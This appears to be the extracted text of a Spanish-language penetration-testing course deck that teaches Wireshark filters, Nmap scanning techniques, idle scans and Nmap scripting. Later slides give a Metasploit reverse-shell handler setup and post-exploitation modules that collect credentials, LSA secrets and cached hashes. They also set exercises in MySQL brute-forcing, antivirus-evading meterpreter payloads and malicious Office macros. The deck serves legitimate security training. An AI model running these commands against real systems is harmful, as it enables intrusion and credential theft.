Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
16. Plugins de Wireshark
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
17. Wireshark 101
● Algunos filtros útiles son:
○ tcp.port==80
○ ip.addr==192.168.1.1
○ ip.src==192.168.1.1 o ip.dst==192.168.1.1
○ http
○ http.request
○ tcp contains password
○ !(arp or icmp or dns)
○ eth.addr==de:ad:be:ef:ca:fe
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
18. Práctica
● Analiza el tráfico de la red actualmente.
○ ¿Qué protocolos son los más usados?
○ ¿Detectaron alguna posible vulnerabilidad?
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
19. Conceptos TCP/IP
Antes de continuar unos conceptos:
● Conexión TCP de 3 vías
● Banderas TCP/IP
● Notación CIDR
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
20. Conexiones TCP
Las conexiones TCP requieren iniciar una conexión para
transmitir o recibir datos.
Debemos entender el protocolo de enlace de tres vías.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
21. Establecimiento de conexión TCP:
Enlace de 3 vías
● Host #1 envia un paquete SYN a Host #2.
● Host #2 envia SYN/ACK a host #1
● Host #1 envia ACK a host #2 y se establece la
conexión.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
22. Notación CIDR (IPv4)
● Dirección IP más sufijo:
192.168.0.1/24
● Algunas equivalencias:
○ /32 ==1 host ==
○ /24 ==254 hosts==255.255.255.0
○ /16==65,534 hosts==255.255.0.0
● En UNIX existe la herramienta ipcalc.El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
23. Notación CIDR (IPv4)
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
24. Nmap
● Página oficial: http://nmap.org
● Nmap es una herramienta de código abierto para
exploración de redes y auditorías de seguridad.(*)
● Se diseñó para analizar rápidamente grandes redes,
aunque funciona muy bien contra equipos individuales.
(*)
● Esencial para pentesters y administradores de
sistemas.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
25. Descargando e instalando Nmap
Para descargarlo desde el repositorio oficial:
$svn co https://svn.nmap.org/nmap
Para instalarlo:
$./configure
$make
#make install
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
26. Dependencias
● libssl-dev
● autoconf
● make
● g++
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
27. Manteniendo tu copia al día
● Para actualizar su copia de nmap:
$svn up
$make -j4
#make install
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
28. Práctica
Ejecute Nmap e identifique que información
regresa.
$nmap <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
29. Práctica
Ejecute Nmap e identifique que información regresa.
Nmap scan report for scanme.nmap.org
Host is up (0.011s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
30. Escaneo básico de Nmap
Un escaneo de Nmap sin argumentos regresa:
○ Estado del objetivo (en línea/desconectado)
○ La dirección IP y nombre de host.
○ Lista de servicios y puertos.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
31. Práctica
Inicien un escaneo a su propia máquina.
● ¿Qué encontraron?
● ¿Algún servicio que no sabían que existía?
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
32. Guardando escaneos de Nmap
Para guardar escaneos en los formatos grepable, XML y
normal utilicen el argumento “-oA”:
$nmap -oA escaneo1 <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
33. Resolución de nombres (DNS)
● Servidores DNS resuelven nombres de dominio a
direcciones IP.
● ¿Qué servidores usan?
○ Los de su ISP
○ Google (8.8.8.8 y 8.8.4.4)
○ Internos
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
34. Especificando servidores DNS
Para especificar que servidores DNS debe usar
Nmap:
$nmap --dns-servers 8.8.8.8,8.8.4.4
<objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
35. ¿Por qué hacer descubrimiento de
hosts?
● Para realizar un inventario de los equipos conectados a
nuestra red.
● Para descubrir que equipos estan activos.
● Para optimizar el proceso de descubrimiento de
servicios.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
36. Descubriendo equipos en la red
● Nmap utiliza las siguientes técnicas:
● SYN/ACK
● UDP
● SCPT INIT
● ICMP
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
37. Descubriendo equipos en la red
Durante la fase de descubrimiento de hosts,
por default Nmap envia:
● Una petición ICMP Echo Request
● Un paquete TCP SYN a puerto 443
● Un paquete ARP al puerto 80
● Una petición ICMP Timestamp
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
38. Descubriendo equipos en la red
● Mandando ICMP Echo Requests a solo un
host:
ping <objetivo>
● O con Nmap:
$nmap -sP -PE <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
39. Descubriendo equipos en la red
● Si estan en la misma red Nmap utilizará
peticiones ARP.
● Si la red es externa usará escaneo
ICMP/SYN.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
40. TCP SYN Ping
● Nmap utilizará los paquetes de respuesta RST o
SYN/ACK para determinar si el objetivo está en línea.
● Por default se manda al puerto 80.
nmap -PS80 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
41. TCP ACK Ping
● Nmap utilizará los paquetes de respuesta RST para
determinar si el objetivo está en línea.
● Por default se manda al puerto 80.
● Requiere privilegios para crear raw sockets. De lo
contrario usa el método TCP SYN.
nmap -PA80 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
42. UDP Ping
● Un host responde con el mensaje ICMP port unreachable cuando se envía
un paquete UDP a un puerto cerrado.
● El host puede responder con otro tipo de mensajes de error ICMP.
● Nmap utiliza estos mensajes para identificar si un host esta en linea.
● Es importante lanzar este “probe” contra un puerto cerrado.
#nmap -PU21,80,53 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
43. SCTP INIT Ping
● Un host responde con ABORT o INIT ACK si esta en
línea.
● Este tipo de escaneo requiere privilegios para crear
paquetes “raw”.
● Este probe es enviado al puerto 80 por default.
# nmap -PY80 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
44. IP Protocol Ping
● Lanza paquetes IP para tratar de ocasionar algún tipo
de respuesta.
● Por default Nmap usa los siguientes protocolos:
○ ICMP (protocolo #1)
○ IGMP (protocolo #2)
○ IP-in-IP (protocolo #4)
#nmap -P0 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
45. Personalizando “probes” de
descubrimiento
Se puede personalizar los puertos que son utilizados para
la fase de descubrimiento de hosts.
# nmap -sP -PS22,3389 192.168.0.1/24
# nmap -sP -PU53 192.168.0.1/24
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
46. Descubriendo equipos en la red
● Barrido DNS:
$nmap -R -sn <objetivo(s)>
$nmap --dns-servers server1,server2 -R -
sn <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
47. Descubriendo equipos en la red
| broadcast-upnp-info:
| 192.168.0.5
| Server: TP-LINK/TL-SC3230N/6.E.2.10117/169.254.88.241
| Location: http://192.168.0.5:49152/edevicedesc.xml
| 192.168.0.8
| Server: Linux/3.0.8, UPnP/1.0, Portable SDK for UPnP devices/1.6.14
| Location: http://192.168.0.8:49152/description.xml
| 192.168.0.42
| Server: Microsoft-Windows/6.2 UPnP/1.0 UPnP-Device-Host/1.0
|_ Location: http://192.168.0.42:2869/upnphost/udhisapi.dll?
content=uuid:383283d1-d95c-4211-9525-b27af762e967
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
48. Práctica
Descubre que información existe en la red actual usando
peticiones de tipo multicast.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
49. Práctica
Descubre que información existe en la red actual usando
peticiones de tipo multicast.
$nmap --script broadcast -sn -Pn -n
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
50. Identificación de sistema operativo
La funcionalidad de detección de sistema operativo
requiere de privilegios especiales, específicamente
permisos para crear “raw sockets”.
#nmap -sV -O <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
51. Identificación de sistema operativo
Limitar escaneo a objetivos con un puerto abierto y uno
cerrado:
#nmap -sV -O --osscan-limit <objetivo(s)>
¿Qué hacer si Nmap no detecta el sistema operativo?
#nmap -sV -O --osscan-guess <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
52. Práctica
Evadir la detección de sistema operativo en
un ambiente UNIX.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
53. Práctica
Evadir la detección de sistema operativo.
#echo 128 > /proc/sys/net/ipv4/ip_default_ttl
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
54. Desactivando escaneo de puertos
● Para desactivar el escaneo de puertos se
usa el argumento “-sn”:
$nmap --script broadcast -sn
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
55. Desactivando descubrimiento de hosts
● Para desactivar la fase de descubrimiento de hosts:
$nmap -Pn -p80 <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
56. Técnicas de escaneo
● TCP SYN
● TCP Connect
● UDP
● TCP Null
● FIN
● XMAS
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
57. Posibles estados de un puerto
● open (abierto)
● closed (cerrado)
● filtered (filtrado)
● unfiltered (no filtrado)
● open|filtered (abierto|filtrado)
● close|filtered (cerrado|filtrado)
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
58. Especificando puertos
● Para especificar un rango
$nmap -p1-100 <objetivo(s)>
● Pueden listar diferentes puertos separandolos con
comas:
$nmap -p22,23,80 <objetivo(s)>
● Pueden escanear absolutamente todos los puertos
disponibles
$nmap -p- <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
59. Especificando puertos
● También se pueden usar nombres de servicios
$nmap -p smtp <objetivo(s)>
● Y nombres de servicio con wildcards:
$nmap -p smtp* <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
60. Detección de servicios
Para iniciar el modo de detección de servicios
se usa el argumento “-sV”:
$nmap -sV <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
61. ¿Qué hacer cuando no los detecta?
Nmap determina que firmas usar basado en un nivel de
“rareza”.
Si el servicio que queremos identificar corre en un puerto
no estándar:
$nmap -sV --version-all <objetivo(s)>
$nmap -sV --version-intensity 9 <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
62. Identificación de servicios vulnerables
¿Cómo usamos esta información para saber si un servicio
es vulnerable?
Si la identificación de versión es exitosa simplemente
tenemos que revisar que vulnerabilidades han sido
publicadas antes.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
63. Timing templates
● Existe un alias para usar diferentes configuraciones de
rendimiento y ajustes de tiempos de espera
predeterminados: -T1-5.
● T3 es el valor default que Nmap usa.
$nmap -sV -O -T4 <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
64. Otros valores interesantes de
optimización
min-hostgroup/max-hostgroup: Número de hosts a
escanear simultáneamente.
min-parallelism/max-parallelism: Número de transmisiones
simultáneas.
max-retries: Número de retransmisiones.
host-timeout: Tiempo de espera antes de ignorar un host.
scan-delay: Tiempo de espera entre “probes”.
min-rate/max-rate: Número de paquetes por segundo.El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
65. TCP SYN Scan
● Escaneo utilizando técnica de “media conexión”.
● Método default de escaneo en Nmap.
#nmap -sS <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
66. TCP Connect Scan
● Técnica de escaneo que establece una conexión
completa para determinar si
● Método default de escaneo en Nmap ejecutándose sin
privilegios.
$nmap -sT <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
67. TCP ACK Scan
● Útil para detectar firewalls.
● Esta técnica solo determina si los puertos estan
filtrados o no filtrados. Es decir, no determina si el
puerto esta abierto o cerrado.
$nmap -sA <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
68. Idle scan
El idle scan es una técnica en la cual usamos la
predictibilidad del número de secuencia TCP IP de una
máquina ”zombie” para escanear a nuestro objetivo
escondiendo nuestro verdadero origen.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
69. Idle scan
Esta técnica depende de la predictibilidad del número de
secuencia TCP ID
Un candidato bueno para ser usado como zombie:
Debe de estar ”idle”.
En nuestro mismo netblock de preferencia.
Impresoras, web cams y routers son muy buenos
candidatos.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
70. Idle scan
Para encontrar zombies:
#nmap -F --script ipidseq -n <host/ip>
#nmap -O -v <host/ip>
Usandolos:
#nmap -Pn -sI ZOMBIE OBJETIVO
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
71. Idle scan
Checamos el IP ID del zombie
Mandamos paquete SYN spoofeado como si viniera del
zombie
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
72. Idle scan
● El objetivo regresa un SYN/ACK
● El zombie regresa un RST e incrementa su IP ID
● Nosotros checamos el IP ID, si incremento el puerto
esta abierto.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
73. Tarea para después
● Encuentra un host con id de secuencia TCP IP
incremental.
● Determinemos si nuestro ISP tiene protección contra
paquetes spoofeados
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
74. IP Protocol Scan
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
75. Ndiff
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Herramienta diseñada para comparar escaneos de
Nmap.
Toma escaneos guardados en formato XML.
$ndiff scan1.xml scan2.xml
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
76. Práctica
● Implementar un sistema de monitoreo utilizando Nmap
y Ndiff.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
77. Práctica
● Implementar un sistema de monitoreo utilizando Nmap
y Ndiff.
1. Realizar un escaneo que refleje el estado
“bueno” de la red.
2. Utiliza Ndiff para comparar el estado actual con
el primer escaneo realizado.
3. Automatiza la tarea!
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
78. Desarrollo NSE (Nmap Scripting Engine) Paulino Calderon
calderon@websec.mx
● Motor de scripts que ha expandido la funcionalidad de
Nmap en todos los aspectos.
● Actualmente existen más de 400 scripts (435 el día que
escribí esto) en el repositorio oficial.
NSE == "Nmap Scripting Engine"
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
79. Más consejos de uso
● Es difícil recordar el nombre de todos los argumentos.
Mantengan abierta una consola en el folder de los scripts y
usen:
cat <script> | grep @args
● No existe una función de autocompletar. ( Entren al
folder de scripts y ejecuten sus escaneos desde ahí? ).
Desarrollo NSE (Nmap Scripting Engine) Paulino Calderon
calderon@websec.mx
http://guadalajaracon.org
GuadalajaraCON
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
80. Ataques de fuerza bruta
Una de las funciones más poderosas de NSE. Existen 51 protocolos
soportados en este momento.
Los argumentos relevantes cuando trabajamos con estos scripts son:
● userdb: Archivo que contiene los nombres de usuario.
● passdb: Archivo que contiene las posibles contraseñas.
● firstOnly: Detener el script cuando se encuentre la primera combinación
válida.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
81. Práctica
Realiza un ataque de fuerza bruta contra el servicio de
MySQL de la máquina #3.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
82. Práctica
Realiza un ataque de fuerza bruta contra el servicio de
MySQL de la máquina #3.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
83. Recolección de información
Además de la lista de servicios existe más información que
nos puede ser de ayuda como:
● Nombres virtuales de dominio.
● Entradas DNS con nombres comunes.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
84. Recolección de información
Además de la lista de servicios existe más información que
nos puede ser de ayuda como:
● Nombres virtuales de dominio.
● Entradas DNS con nombres comunes.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
85. Descubriendo entradas DNS
El script dns-brute lanza un ataque de diccionario para
encontrar entradas DNS.
$nmap --script dns-brute <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
86. Descubriendo sitios móviles
Existe el script http-mobileversion-checker que compara
peticiones usando diferentes cabeceras User Agent para
descubrir sitios móviles:
$nmap -p80,443 --script http-mobileversion-
checker <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
87. Descubriendo vulnerabilidades de
inyección de código en webapps
NSE también tiene scripts para automatizar la detección de
posibles vulnerabilidades de tipo:
● Cross Site Scripting
● SQL Injection
● Local File Inclusion
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
89. Metasploit es un framework de explotación de
vulnerabilidades que actualmente cuenta con:
● +1,300 exploits
● +700 módulos auxiliares
● +300 payloads
● +30 encoders
http://www.metasploit.com/
Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
90. ● Integración con PostreSQL.
● Meterpreter
Metasploit 101: Otros aspectos interesantes
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
91. Para realizar búsquedas:
search “oracle”
Para establecer valores de variables:
set <VARIABLE> <VALOR>
Para establecer valores de variables:
setg <VARIABLE> <VALOR>
Para obtener información sobre un módulo:
info <modulo>
Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
92. Para seleccionar un módulo:
use <modulo>
Para ver las opciones del módulo:
show options
Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
93. Listado de sesiones activas:
sessions -l
Iniciar modo interactivo con alguna sesión
sessions -i <# de sesión>
Para regresar a la consola de msf
background
Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
94. Ejecución de múltiples comandos
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
set AutoRunScript multi_console_command -rc autorun-msf.rc
exploit -j
95. Ejecución de múltiples comandos
run post/windows/escalate/getsystem
run post/windows/gather/credentials/credential_collector
run post/windows/gather/lsa_secrets
run post/windows/wlan/wlan_profile
run post/windows/gather/cachedump
run post/windows/gather/enum_db
run post/windows/gather/screen_spy
96. ● Obtén la mayor cantidad de llaves de las máquinas
vulnerables.
Prácticas: Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
97. ● ¿Cómo funcionan los AVs?
● ¿Qué vamos a hacer si casi el 100% de las
organizaciones utilizan algún AV?
● ¿AV is dead?
Evasión de antivirus
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
98. ● Genera un binario de meterpreter que no sea detectado
por el AV instalado en tu sistema.
Práctica: Evasión de antivirus
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
99. Existen otros ataques de redes que funcionan cerca del 100% del tiempo:
● WPAD spoofing
● LLMNR spoofing
● ARP spoofing
Otros ataques a redes
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
101. ● ¿Qué es un ataque de ingeniería social?
● ¿Qué tan efectivos son estos ataques?
Ataques de ingeniería social
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
102. ● Crea un documento de Office con un macro malicioso
Práctica: Ataques de ingeniería social
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
103. ● ¿Qué hacemos una vez que tenemos nuestra primera
cuenta?
● ¿Qué información necesitamos recolectar en esta
etapa?
Post explotación
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>